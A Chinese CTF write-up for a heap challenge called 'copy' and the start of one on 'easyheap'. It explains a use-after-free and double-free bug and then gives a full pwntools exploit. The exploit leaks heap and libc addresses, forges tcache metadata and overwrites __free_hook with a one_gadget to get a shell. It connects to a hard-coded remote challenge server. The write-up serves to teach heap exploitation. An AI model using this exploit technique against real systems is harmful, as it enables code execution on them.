copy:
这题主要考察堆风水(heap feng shui)的利用。运行程序可以发现:每次申请块之后程序都会立刻 free 掉这个块,但保存的指针并没有被清空,接下来的删除操作(造成 double free)和显示操作(读取已释放块的内容)仍然可以使用这个悬垂指针,因此存在 UAF 漏洞。利用思路大致为:先通过显示已释放块泄露堆地址,再伪造 tcache 结构进而泄露 libc 地址,最后把 __free_hook 改写为 one_gadget;剩下的都是堆风水的细节,直接看下面的 exp,不再赘述。
exp:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
#from LibcSearcher import LibcSearcher
# context.log_level = 'debug'
binary = 'copy11'
elf = ELF('copy11')
libc = elf.libc            # libc that pwntools resolves for the target ELF
context.binary = binary    # fixes arch/endianness for p64/u64 below
DEBUG = 0                  # nonzero: run the binary locally instead of the remote service

if DEBUG:
    p = process(binary)
    # p = process(binary, env={"LD_PRELOAD": "./libc-2.27.so"})
else:
    host = "183.129.189.60"
    port = 10034
    p = remote(host, port)

# one_gadget candidates; NOTE(review): this name is rebound with a different
# (libc-2.27) set further down in the script, so these values are never used.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
# malloc, free, realloc, system offsets -- defined but not referenced below.
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]


def l64():
    """Decode the 64-bit pointer whose top byte (0x7f) was just received.

    Reads up to and including the first 0x7f byte, takes the 6 bytes ending
    there and zero-extends them to 8 -- only valid for userland pointers of
    the 0x7fxx.... form (libc / stack), not for heap or PIE addresses.
    """
    return u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64(): decode the 4 bytes ending in 0xf7."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def sla(a, b):
    """sendlineafter() with both marker and data coerced to str."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """sendafter() (no trailing newline) with str coercion, for raw payloads."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log a leaked value as 'name: 0x...' through pwntools' success()."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    """Raw send without a newline."""
    return p.send(payload)


def rl():
    """Receive whatever is currently available."""
    return p.recv()


def sl(payload):
    """Send a line."""
    return p.sendline(payload)


def ru(a):
    """Receive up to and including marker ``a`` (coerced to str)."""
    return p.recvuntil(str(a))
def cmd(idx):
    """Answer the target's "choice:" prompt with menu entry ``idx``."""
    return p.sendlineafter("choice:", str(idx))
def add(idx, size, payload):
    """Allocate through sub-menu ``idx`` (option 1 of that sub-menu).

    Sub-menu 1 asks for a size before the data; the other sub-menu
    (presumably the "copy" operation) takes data only, so ``size`` is
    ignored there.  ``payload`` is sent raw, without a newline, so binary
    data containing 0x0a is not cut short.
    """
    cmd(idx)
    cmd(1)
    if idx == 1:
        sla("input size:", str(size))
    sa("input data:", payload)
def free(idx, idx1):
    """Delete entry ``idx1`` through sub-menu ``idx`` (option 2).

    Per the writeup the target keeps the pointer after its own free, so
    this call on an already-freed entry acts as a double-free primitive.
    """
    for choice in (idx, 2):
        cmd(choice)
    sla("index?\n", str(idx1))
def show(idx, idx1):
    """Print entry ``idx1`` through sub-menu ``idx`` (option 3).

    Used on freed entries to read allocator metadata (read-after-free).
    """
    p.sendlineafter("choice:", str(idx))
    p.sendlineafter("choice:", str(3))
    p.sendlineafter("index?\n", str(idx1))
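# ---------------------------------------------------------------------------
# Exploit flow (tcache-era heap; constants are tied to the remote libc build,
# which the LD_PRELOAD comment above and the 0x3ebca0 offset suggest is 2.27):
#   1. leak a heap pointer by show()ing an entry the program already freed,
#   2. write a forged tcache_perthread_struct at what appears to be the heap
#      base so a following show() leaks a libc pointer,
#   3. point a tcache entry at __free_hook and overwrite it with a one_gadget.
# Every add/free/show call is order-sensitive heap feng shui: do not reorder
# or merge calls without re-checking the layout in gdb.
# ---------------------------------------------------------------------------

# --- 1. heap leak -----------------------------------------------------------
add(1, 0x90, "a")
free(1, 0)               # entry 0 was already freed by the program -> double free
add(1, 0x90, "aaa")
show(1, 0)
ru("data: ")
# recvn(6) blocks until all 6 bytes arrive; recv(6) may return a partial read
# over the network and would silently decode a wrong heap address.
heap_addr = u64(p.recvn(6).ljust(8, "\x00"))
lg("heap_addr", heap_addr)

# Target of the later writes; assumed (from the +0x10 user-pointer offset) to
# be heap_base + 0x10, where the tcache_perthread_struct lives -- TODO confirm.
tcache_struct = heap_addr - 0x11e00 - 0xb0 + 0x10

# --- 2. forge tcache metadata, leak libc ------------------------------------
add(1, 0x90, p64(tcache_struct - 0x100))
free(1, 0)
free(1, 1)
add(2, 0x90, p64(tcache_struct))
# Forged tcache_perthread_struct (layout presumed, verify in gdb):
#   0x00 count bytes 0x01 0x01 .. 0x08 0x01 -- the 0x08 presumably marks the
#        0xa0 bin as full so the next free of a 0x90 request goes to the
#        unsorted bin, whose fd is the libc pointer show() leaks below;
#   0x40 entries[]: 0x20 bin -> fake chunk inside this struct (size 0x31),
#                   0x30 bin -> heap_addr + 0xa0;
#   the trailing 0x31 / 0x21 qwords look like fake chunk size fields.
forged_tcache = (
    p64(0x101) + p64(0x0108)
    + p64(0) * 6
    + p64(tcache_struct + 0x60)
    + p64(heap_addr + 0xa0)
    + p64(0) + p64(0x31)
    + p64(0) * 3 + p64(0x21)
    + p64(heap_addr + 0xa0)        # == heap_addr + 0xb0 + 0x10 - 0x20
    + p64(tcache_struct + 0x50)
)
add(2, 0x90, forged_tcache)
show(1, 0)
# 0x3ebca0 is the main_arena+96 (unsorted bin head) offset of the common
# Ubuntu 18.04 libc-2.27 build; a different libc needs a different constant.
libc_base = l64() - 0x3ebca0
lg("libc_base", libc_base)
free_hook = libc_base + libc.sym["__free_hook"]

# --- 3. hijack __free_hook --------------------------------------------------
# libc-2.27 one_gadget candidates; index 1 is used.  Its register/stack
# constraints are not checked here -- if no shell spawns, try the other
# offsets or fall back to libc.sym["system"] with "/bin/sh" in the freed chunk.
one_gadgets = [0x4f2c5, 0x4f322, 0x10a38c]
one = libc_base + one_gadgets[1]

fixup = p64(0) * 5 + p64(0x31) + p64(0) * 5   # re-plants a 0x31 size field (presumed)
free(2, 1)
add(2, 0x90, fixup)
add(1, 0x18, p64(free_hook) * 3)   # 0x20 request: presumably writes &__free_hook into the fake chunk's next ptr
free(1, 1)
add(1, 0x60, p64(one))             # this allocation should now be served at __free_hook
# gdb.attach(p)
p.interactive()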
easyheap:
溢出点:
libc 2.27 下的 off by null 可以参考 cnitlrt 的文章;本题的利用手法和我简书上的第二题类似,只是多加了一个沙盒: